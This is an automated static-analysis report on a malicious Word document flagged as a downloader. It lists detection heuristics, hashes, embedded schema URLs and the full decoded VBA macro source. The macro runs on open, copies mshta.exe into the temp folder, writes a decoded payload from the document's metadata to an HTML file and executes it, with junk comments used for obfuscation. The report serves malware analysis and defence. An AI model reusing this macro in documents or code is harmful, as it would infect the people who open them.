Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7a633a8c10ec64fd…

MALICIOUS

Office (OOXML)

100.6 KB Created: 2020-11-18 21:26:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-23
MD5: 5f596219a4c1b50d5de18e272b25a78f SHA-1: 4a4e8b245a604afaa0bc265a0195b3869ae25467 SHA-256: 7a633a8c10ec64fd3024d8735dabf0f22c9b1ee165fb0876cfc265c0f4d9bd2e
138 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Call CreateObject("ws" + aLe1a + "ell").run(aoqck)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    aiE4r = Environ(anzx27)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10806 bytes
SHA-256: d0a93ac097c871d905bc538e35dedd1f3cbb91adda1fc91f0a3b39c16c749146
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "agX5B"
Sub AutoOpen()
' Hog wanna records tambourine
auSZrg
End Sub

Attribute VB_Name = "ayJfoq"
Public Const aVLl2g As String = ""
Public Const ameiM9 As Integer = 358 - 345
Public Const asSkn As String = "1ridn1iw1"
Public Const a8VFg As String = "231met1sys1"
Public Const aE9gD As String = "p1m1e1t"
Public Const aLe1a As String = "cript.sh"
Function aTVuxK()
End Function
Sub aTgBN(aGf8l)
' Gallon
' Hz
' Grants uncritical irrigation oyster chronic additions
' Comparison fireplace nowhere impact
' Specifying halloween preston lathe wings
' Likewise layer geometry nominated
' Buttoned hey educate
' Queen damaged olive
' Electrode trifled allocation exhibitions
' Aura formations elegant trade hoes
' Environs hiking annual
' X roll
' Transgress information
' Federation downloads apostrophe
' Option insincerity
' Makes dominoes unlike lopez holdings
' Carmine avoidance gbp about shipwreck
' Rancorous self-reliant gripping glorification tunis
' Sw
' Politics mohawk unprotected inventory
' Eva answer minimize cashiers
' Specialized blister fight dalliance piquant aerial
' In- blowing illinois
' Enumeration desperate university hotmail specialist bivouac
End Sub
Function aPKuj(aPj7gx)
' Bee chewing wards truly turns
' Tatiana water
' Brooch cubic piss
' Indisposition delhi mounts
' Collecting degree sample
' Underlie blend personal tenement
' Grant childrens augmentation cum
' Denote trevor
' Cups theoretical imprudent itinerant pedagogue
' Dour commodities fillet
' Complementary
' Nn functioning
' Unconcern nirvana fertilizer tagged
' Valparaiso burst bathroom veined
' Salvador bread jc muslims
' Heavily physics idol
' Disorder
' Thirty restriction
' Thrive algebra regularly guerdon
' Heart-rending janus hugo ventilation
' Emanuel org pointed
' Cheerless nextel
aPKuj = ActiveDocument.BuiltInDocumentProperties(aPj7gx)
End Function
Public Sub a0h3e()
aAc7v6
End Sub
Public Sub ahlOzv()
a5m7pT
End Sub

Attribute VB_Name = "ajiyG"
Public Function aACQT(amaAD, ac2o7)
' Jeweller alleviate usable
' Physiology somber
' Discrimination tartar
' Mentor virtual passport document
' Euphrates across barricade its tottering petted
' Tamil
' Stentorian tum hydrogen
' Drought unconsciousness laundress api
' Cypress motorcycle plug
' Exp ss theocracy dick
' Inert
' Lancet buff increased bruising honda sticky
' Lenient temporarily zest gander outlawed
' Silk indubitable
' Matching
FileNumber = FreeFile
Open amaAD For Output As #FileNumber
' Quince beginning
Print #FileNumber, ac2o7
' Component footstep
' Carnivorous
' Beth hub align assembling manipulation surpass ledger
' Someone godhead
' Thrifty farms governor butchers ul
' Hoof export
' Exit
' Scraped
' Persuasive thinker technical
' Blogging expenses jamie tribute sardinia
' Be foal remiss refraction
Close #FileNumber
End Function
Sub azje8(aUfX0, a3d4Pg)
' Drivers basement blithe
' Luscious forth tricks
' Debauchery
' Transcending visitation lodger
' Guests
' Cereal
' Dev loafer mounts goto
' Sickening outwardly episcopal articulated
' Villages
' Flight shaw godlike insured although frankfurt
' Senegal hoover nothingness
' Threshold korea fabrication
' Inaudible thorough hemlock
' Marche diameter peninsula real
' Physiology wean
' Noose rift fridge content
' Prepaid
' Medicines terra joseph officiate
' Mace zero scrip baking
' Assign endif comport consent box ailing
' Varieties unity
' Gymnasium
' Diameter tariff
FileCopy aUfX0, a3d4Pg
End Sub
Function aExWK(aTBDL7)
aExWK = aTBDL7
End Function
Function ahPpLr(aTBDL7) As String
Dim axw8y As Long
Dim aQe30 As Integer
Dim aftnQ As Integer
For axw8y = 1 To Len(aTBDL7)
aftnQ = 0
' Yearling pf surrounding
acHro = Mid(aTBDL7, axw8y, 1)
aQe30 = Asc(acHro)
' Unutterable upstart appliance eu specter recipes
If (aQe30 > aqXnbZ(17226 - 17225) And aQe30 < aqXnbZ(5350 / 2675)) Or (aQe30 > aqXnbZ(2735 - 2732) And aQe30 < aqXnbZ(14080 / 3520)) Then
aftnQ = ameiM9
aQe30 = a7h4w3(aQe30, aftnQ)
If aQe30 < aqXnbZ(5) And aQe30 > 83 Then
aQe30 = azQL2(aQe30)
ElseIf aQe30 < 166 - 101 Then
aQe30 = azQL2(aQe30)
End If
End If
aPjsu = awovqB(aQe30)
Mid$(aTBDL7, axw8y, 1) = aExWK(aPjsu)
Next axw8y
ahPpLr = aTBDL7
End Function

Attribute VB_Name = "aOWFXu"
Function aBgY3(awVny)
aTDAS = awVny
aYt3ua = Len(aTDAS)
For aeKFSv = 0 To aYt3ua - 1
' Clipped malayan sufficiently
' Sw indigenous
' Screening era use toolbar
' Sell scary disrespect
' Treasurer brabant daddy
' Announced acdbentity blocking
' Moisten gba variety assailant
' Attributes bomb
' Warily ons buzz associates
' Avon premise sluggish trading joust
' Crew personnel
a371g = a371g & Mid(aTDAS, (aYt3ua - aeKFSv), 1)
Next aeKFSv
' Felt nomadic residuum bracket revise ile remark
' Present nation evolutionary irrigation idol immediate
' Narcissist
' Empirical kurt
' Relating earldom coercion adduced holds alabaster reggie
' Atomic photograph
' Elite venice forty-three importation assassin
' Operate korean
' Congress xl tolerance dunno
' Vietnamese miry exp tab
' Niche eastwards oily impervious
aBgY3 = a371g
End Function
Public Function a3sPQW(afH0ng)
a3sPQW = Replace(afH0ng, aVLl2g, "")
End Function
Sub auSZrg()
' Nasty
' Target draws tahiti
' Qatar sequence damaged
' Ski fallow
' Moderator students taboo embryo
' Responded hiv placement chile
' Iambic surround together contingent
' Mangrove anchorage exact
' Salvador blatant hitachi tee mica
' Federation lucky cheaper odorous
' Markings
a0h3e
ahlOzv
' Webmaster login gauzy
' Radiate domino
' Surrey circumvent recluse
' Flinty last implement advisory
' Fiji franchise myself cognac
' Solicitous grub esprit vacation shot accessible
' Spending
' Shipment jacket rip illimitable
' Aggression
' Cheshire steamed himself beck
' Detail spas
' Polar turban
' Ment medium
' Likelihood devil
' Resides father entice
' Concave sand
' Postmaster trend bawl higher
' Tee pod sends ahead
' Pigeon af sepulture marks pentium
' Jacobus nearly edition ladle apps blight
' Lapland lexus inspector
' Derived def
Call CreateObject("ws" + aLe1a + "ell").run(aoqck)
End Sub

Attribute VB_Name = "a6x97o"
Function aiE4r(anzx27)
aiE4r = Environ(anzx27)
End Function
Function abF2zX()
' Threshing matrix colours illinois
' Loot afghanistan
' Primacy expostulation contract
' Official probe
' Bragging orally
' Volga lorenz cameras
' Agrarian tutelage approximately roster
' Suppose ieee creates threatened
' Yang stress womankind enumeration
' Lauderdale decrease fall hilltop
' September munificent services
With Application
abF2zX = .PathSeparator
End With
End Function
Function auDvEl(al2Cj)
' Laudable ravages disorder
aUhzX = VBA.Split(aBgY3("lmth.ni|moc.ni|exe.athsm"), "|")
' Min max diametrically effeminacy heliotrope
' Flimsy neutralize duties
' Smuggle adamant cell kidney
' Image broadband splinter
' Simple heater woods vat
' Academies yew adjustable unsociable
' Vids tripoli funk efficacious
' Task internship rip sat.
' Squalor crater crabs ps.
' Symptom screensavers grease kinda
' Isbn mexican how mainstream
' Ebooks
' Evergreen phillip compulsory carrying
' Profits shareware
' Paperback
' Chat funny vans trollope
' Grave servers ur bentley
' Baal analytical pa solutions papers
' Illegitimate snaps yule
' Donor
' Prism sq brilliance
' Peripherals rectangular mattress
' Panorama
' Undertakings lebanon adult disturbed
' Shortcuts officiate associates castaway pledge
' Allowance stew actual majority
' Luminary swedish diver engines efficacy ir
' Loveless guidelines proven thesis
' Brooded io
' Crm truth wma idaho weighted
' Commendable loathe rh cho
' Amphitheatre pure guide widen
Select Case al2Cj
Case 0:
' Vowel gnu
' Unauthorized informal
' Infant grandpa
' Balustrade ended jonathan wag
' Exterior xl limits alton
' Furze representation say cove brunette
' Confederation richards participle articles debt
' Midnight pick
' Administrators clear
' Deign froward vt flippant
auDvEl = aiE4r(Replace(aBgY3(asSkn), "1", "")) & abF2zX & Replace(aBgY3(a8VFg), "1", "") & abF2zX & aUhzX(0)
Case 1:
' Ottawa different ec notices pewter
' Wu comics
' Deposition etching santa ownership dt
' Liable against prune trident there
' Sieve affiliation thereafter
' Challenged hypothesis conferences perceived astronomer
' Xanax miss
' Permit cartel loans
' Nowhere contemporaneous admit can nj
' Algebra damped crumble
' Struggle wy roommate
auDvEl = aiE4r(Replace(aBgY3(aE9gD), "1", "")) & abF2zX & aUhzX(1)
' Unavailable frequency
Case 2:
auDvEl = aiE4r(Replace(aBgY3(aE9gD), "1", "")) & abF2zX & aUhzX(2)
End Select
End Function
Sub a5m7pT()
arXdT = agQIB3(auDvEl(2))
aACQT arXdT, ahPpLr(aPKuj("category"))
End Sub

Attribute VB_Name = "aUIpaz"
Function aGiC7D(am1sS)
' Das retention
' Bowler outwardly michel newark
' Writing window receiving serves describing
' Travesti motels zoo
' Quarto adjustable
' Adrian scanner third
' Infant mailed bel
' Sake -s yugoslavia
' Rotary eliminate analyst slav
' Valve corpulent floral meager
aGiC7D = (a3sPQW(am1sS))
End Function
Function afNZuL(aNgTB4)
' Syphilis uses
afNZuL = (a3sPQW(aNgTB4))
End Function
Function agQIB3(awG0c)
agQIB3 = (a3sPQW(awG0c))
End Function
Function aoqck()
aR9zg = afNZuL(auDvEl(1))
aMiY4 = agQIB3(auDvEl(2))
aoqck = aR9zg & " " & aMiY4
End Function

Attribute VB_Name = "aEf1v"
Sub aAc7v6()
akUrX = aGiC7D(auDvEl(0))
ad8Mp = afNZuL(auDvEl(1))
azje8 akUrX, ad8Mp
End Sub
Function azQL2(aMZ0v)
azQL2 = aMZ0v + 467 - 441
End Function
Function aqXnbZ(aMQ9V1)
If aMQ9V1 = 0 Then
aqXnbZ = 12941 / 12941
ElseIf aMQ9V1 = 1 Then
aqXnbZ = -288 + 352
ElseIf aMQ9V1 = 2 Then
aqXnbZ = 410 - 319
ElseIf aMQ9V1 = 3 Then
aqXnbZ = 24000 / 250
ElseIf aMQ9V1 = 4 Then
aqXnbZ = 200 - 77
ElseIf aMQ9V1 = 5 Then
aqXnbZ = 169 - 72
Else
aqXnbZ = 1047 - 23
End If
End Function
Function a7h4w3(aMZ0v, a3WJh)
a7h4w3 = aMZ0v - a3WJh
End Function
Function awovqB(aMZ0v)
awovqB = VBA.ChrW(aMZ0v)
' Slander sweden analytic simpson
' Butler missions sex rf marbles
' Polo neural
' Noise compromise swap mailing
' Mangy infidel
' Gp misc loath
' Salesman petroleum appraised martha
' Embodiment schools handjob
' Eth fir mailed shack spiced accurately bewildering
' Linux pad abler
' Mixer beautifully
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 47104 bytes
SHA-256: 91e0e97e91e889495382b0d7faab3c7bc2251d06f5b4b707e9b2dfb7cb38de41

Open this report in the interactive analyzer, or submit your own file for analysis.